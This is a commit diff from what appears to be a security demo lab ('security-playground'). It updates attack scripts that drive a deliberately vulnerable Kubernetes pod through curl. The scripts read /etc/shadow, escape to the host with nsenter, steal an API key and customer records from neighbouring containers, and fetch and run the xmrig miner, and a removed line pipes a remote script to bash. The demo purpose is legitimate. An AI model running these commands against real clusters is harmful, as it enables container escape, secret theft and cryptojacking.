Updated to multi-arch (M1) and added limits

Author: jasonumiker-sysdig

example-curls-nodrift.sh

@@ -4,7 +4,7 @@
 NODE_IP=$(kubectl get nodes -o wide | awk 'FNR == 2 {print $6}')
 NODE_PORT=30002
 
-echo "1. Exploit reading our /etc/shadow file and sending it back to us"
+echo "1. Read a sensitive file (/etc/shadow)"
 curl $NODE_IP:$NODE_PORT/etc/shadow
 
 echo "2. Exploit writing to /bin"
@@ -15,26 +15,30 @@ curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 /bin/hello'
 echo "and then run it"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello'
 
-echo "3. Exploit installing nmap and running a scan"
+echo "3. Install nmap from apt and then run a scan"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org'
 
-echo "4. Break out of our namespace to the host's with nsenter and install crictl in /usr/bin"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl https://z9k65lokhn70.s3.amazonaws.com/install-crictl.sh | bash'
+echo "4. Break out of our Linux namespace to the host's with nsenter and install crictl in /usr/bin"
+ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.1/crictl-v1.26.1-linux-$ARCH.tar.gz"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.26.1-linux-$ARCH.tar.gz -C /usr/bin"
 
-echo "5. Break out of our namespace to the host's with nsenter and talk directly to the container runtime"
+echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps'
 
-echo "6. Exfil some data from another container running on the same Node"
+echo "6. Steal a secret from another container on the same Node (hello-client-allowed in the team1 Namespace)"
+HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client-allowed -q')
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID /bin/sh -c set" | grep API_KEY
+
+echo "7. Exfil some data from another container running on the same Node"
 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
 
-echo "7. Call the Kubernetes API via security-playground's K8s ServiceAccount"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.26.4/2023-05-11/bin/linux/amd64/kubectl'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:110623'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods'
-
-echo "8. Exploit running a script to run a crypto miner"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
+echo "8. Download and run a common crypto miner (xmrig)"
+if [[ "$ARCH" == "amd64" ]]; then
+    curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz"    
+else
+    curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz"   
+fi
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'

example-curls-restricted.sh

@@ -4,7 +4,7 @@
 NODE_IP=$(kubectl get nodes -o wide | awk 'FNR == 2 {print $6}')
 NODE_PORT=30001
 
-echo "1. Exploit reading our /etc/shadow file and sending it back to us"
+echo "1. Read a sensitive file (/etc/shadow)"
 curl $NODE_IP:$NODE_PORT/etc/shadow
 
 echo "2. Exploit writing to /bin"
@@ -15,26 +15,30 @@ curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 /bin/hello'
 echo "and then run it"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello'
 
-echo "3. Exploit installing nmap and running a scan"
+echo "3. Install nmap from apt and then run a scan"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org'
 
-echo "4. Break out of our namespace to the host's with nsenter and install crictl in /usr/bin"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl https://z9k65lokhn70.s3.amazonaws.com/install-crictl.sh | bash'
+echo "4. Break out of our Linux namespace to the host's with nsenter and install crictl in /usr/bin"
+ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.1/crictl-v1.26.1-linux-$ARCH.tar.gz"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.26.1-linux-$ARCH.tar.gz -C /usr/bin"
 
-echo "5. Break out of our namespace to the host's with nsenter and talk directly to the container runtime"
+echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps'
 
-echo "6. Exfil some data from another container running on the same Node"
+echo "6. Steal a secret from another container on the same Node (hello-client-allowed in the team1 Namespace)"
+HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client-allowed -q')
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID /bin/sh -c set" | grep API_KEY
+
+echo "7. Exfil some data from another container running on the same Node"
 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
 
-echo "7. Call the Kubernetes API via security-playground's K8s ServiceAccount"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.26.4/2023-05-11/bin/linux/amd64/kubectl'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:110623'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods'
-
-echo "8. Exploit running a script to run a crypto miner"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
+echo "8. Download and run a common crypto miner (xmrig)"
+if [[ "$ARCH" == "amd64" ]]; then
+    curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz"    
+else
+    curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz"   
+fi
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'

example-curls.sh

@@ -4,7 +4,7 @@
 NODE_IP=$(kubectl get nodes -o wide | awk 'FNR == 2 {print $6}')
 NODE_PORT=30000
 
-echo "1. Exploit reading our /etc/shadow file and sending it back to us"
+echo "1. Read a sensitive file (/etc/shadow)"
 curl $NODE_IP:$NODE_PORT/etc/shadow
 
 echo "2. Exploit writing to /bin"
@@ -15,26 +15,30 @@ curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 /bin/hello'
 echo "and then run it"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello'
 
-echo "3. Exploit installing nmap and running a scan"
+echo "3. Install nmap from apt and then run a scan"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org'
 
-echo "4. Break out of our namespace to the host's with nsenter and install crictl in /usr/bin"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl https://z9k65lokhn70.s3.amazonaws.com/install-crictl.sh | bash'
+echo "4. Break out of our Linux namespace to the host's with nsenter and install crictl in /usr/bin"
+ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.1/crictl-v1.26.1-linux-$ARCH.tar.gz"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.26.1-linux-$ARCH.tar.gz -C /usr/bin"
 
-echo "5. Break out of our namespace to the host's with nsenter and talk directly to the container runtime"
+echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps'
 
-echo "6. Exfil some data from another container running on the same Node"
+echo "6. Steal a secret from another container on the same Node (hello-client-allowed in the team1 Namespace)"
+HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client-allowed -q')
+curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID /bin/sh -c set" | grep API_KEY
+
+echo "7. Exfil some data from another container running on the same Node"
 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
 
-echo "7. Call the Kubernetes API via security-playground's K8s ServiceAccount"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.26.4/2023-05-11/bin/linux/amd64/kubectl'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:110623'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods'
-
-echo "8. Exploit running a script to run a crypto miner"
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
+echo "8. Download and run a common crypto miner (xmrig)"
+if [[ "$ARCH" == "amd64" ]]; then
+    curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz"    
+else
+    curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz"   
+fi
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'

security-playground-nodrift.yaml

@@ -38,6 +38,13 @@ spec:
               port: http
           securityContext:
             privileged: true
+          resources:
+            requests:
+              memory: "256Mi"
+              cpu: "250m"
+            limits:
+              memory: "512Mi"
+              cpu: "500m"
 ---
 apiVersion: v1
 kind: Service

security-playground-restricted.yaml

@@ -50,6 +50,13 @@ spec:
             allowPrivilegeEscalation: false
             capabilities:
               drop: ["ALL"]
+          resources:
+            requests:
+              memory: "256Mi"
+              cpu: "250m"
+            limits:
+              memory: "512Mi"
+              cpu: "500m"
 ---
 apiVersion: v1
 kind: Service

security-playground.yaml

@@ -62,6 +62,13 @@ spec:
               port: http
           securityContext:
             privileged: true
+          resources:
+            requests:
+              memory: "256Mi"
+              cpu: "250m"
+            limits:
+              memory: "512Mi"
+              cpu: "500m"
 ---
 apiVersion: v1
 kind: Service